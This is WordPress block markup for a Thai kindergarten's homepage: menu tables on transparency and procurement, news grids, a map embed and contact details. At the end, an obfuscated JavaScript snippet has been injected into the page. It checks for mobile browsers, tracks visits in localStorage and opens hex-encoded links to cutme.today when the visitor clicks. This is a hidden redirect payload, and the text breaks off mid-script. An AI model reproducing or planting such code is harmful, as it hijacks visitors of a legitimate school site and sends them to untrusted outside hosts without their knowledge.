{\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 